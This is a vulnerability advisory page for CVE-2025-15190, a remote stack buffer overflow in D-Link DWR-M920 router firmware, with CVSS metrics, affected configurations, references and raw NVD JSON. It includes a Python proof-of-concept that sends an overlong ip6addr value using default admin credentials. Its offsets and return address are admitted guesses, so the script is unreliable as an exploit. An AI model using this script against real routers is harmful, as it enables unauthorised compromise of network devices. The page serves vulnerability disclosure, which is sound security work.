Security Vulnerability Report
CVE-2025-15190 CVSS 8.8 HIGH

Published: 2025-12-29 14:15:56
Last Modified: 2025-12-30 20:41:19

Description

A security flaw has been discovered in D-Link DWR-M920 up to 1.1.50. Impacted is the function sub_42261C of the file /boafrm/formFilter. The manipulation of the argument ip6addr results in stack-based buffer overflow. The attack may be launched remotely. The exploit has been released to the public and may be exploited.

CVSS Details

CVSS Score: 8.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:dlink:dwr-m920_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:dlink:dwr-m920:-:*:*:*:*:*:*:* - NOT VULNERABLE
D-Link DWR-M920 firmware version <= 1.1.50

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
# CVE-2025-15190 PoC - D-Link DWR-M920 Stack Buffer Overflow
# Affected: D-Link DWR-M920 firmware <= 1.1.50
# Location: /boafrm/formFilter sub_42261C function
# Parameter: ip6addr

import requests
import sys

target_ip = sys.argv[1] if len(sys.argv) > 1 else "192.168.1.1"
target_port = sys.argv[2] if len(sys.argv) > 2 else "80"

# Construct malicious payload
# Fill the buffer and overwrite return address
# Adjust offset based on actual firmware analysis
buffer_size = 1024  # Estimated buffer size
padding = b"A" * buffer_size

# Overwrite return address with shellcode address or ROP gadget
# In embedded devices, address may be predictable
return_address = b"\x40\x22\x04\x02"  # Example address, adjust per target

# Optional: Add shellcode for command execution
# shellcode = b"\x90" * 100  # NOP sled
# shellcode += b"\xcc" * 50  # Breakpoint for testing

payload = padding + return_address

# IPv6 address with overflow
malicious_ip6addr = "2001:db8::" + payload.decode('latin-1', errors='ignore')

url = f"http://{target_ip}:{target_port}/boafrm/formFilter"

data = {
    "ip6addr": malicious_ip6addr,
    "submit-btn": "submit"
}

headers = {
    "Content-Type": "application/x-www-form-urlencoded",
    "Authorization": "Basic " + "YWRtaW46YWRtaW4="  # admin:admin default credentials
}

print(f"[*] Sending exploit to {url}")
print(f"[*] Payload length: {len(payload)}")

try:
    response = requests.post(url, data=data, headers=headers, timeout=10)
    print(f"[+] Request sent. Status code: {response.status_code}")
except requests.exceptions.RequestException as e:
    print(f"[-] Request failed: {e}")

print("[*] Check if shell is obtained or device has crashed")

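References

https://github.com/panda666-888/vuls/blob/main/d-link/dwr-m920/formFilter.md
https://github.com/panda666-888/vuls/blob/main/d-link/dwr-m920/formFilter.md#poc
https://vuldb.com/?ctiid.338575
https://vuldb.com/?id.338575
https://vuldb.com/?submit.723553
https://www.dlink.com/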

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-15190", "sourceIdentifier": "[email protected]", "published": "2025-12-29T14:15:55.767", "lastModified": "2025-12-30T20:41:18.593", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security flaw has been discovered in D-Link DWR-M920 up to 1.1.50. Impacted is the function sub_42261C of the file /boafrm/formFilter. The manipulation of the argument ip6addr results in stack-based buffer overflow. The attack may be launched remotely. The exploit has been released to the public and may be exploited."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": 
"NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "baseScore": 9.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE"}, "baseSeverity": "HIGH", "exploitabilityScore": 8.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-119"}, {"lang": "en", "value": "CWE-121"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:dlink:dwr-m920_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding": "1.1.50", "matchCriteriaId": "1236073E-31A1-4A4E-81B2-76B6B90BC85D"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:dlink:dwr-m920:-:*:*:*:*:*:*:*", "matchCriteriaId": "E815EF72-10FC-43A4-84A7-A25ABE7A4640"}]}]}], "references": [{"url": "https://github.com/panda666-888/vuls/blob/main/d-link/dwr-m920/formFilter.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": 
"https://github.com/panda666-888/vuls/blob/main/d-link/dwr-m920/formFilter.md#poc", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.338575", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.338575", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.723553", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://www.dlink.com/", "source": "[email protected]", "tags": ["Product"]}]}}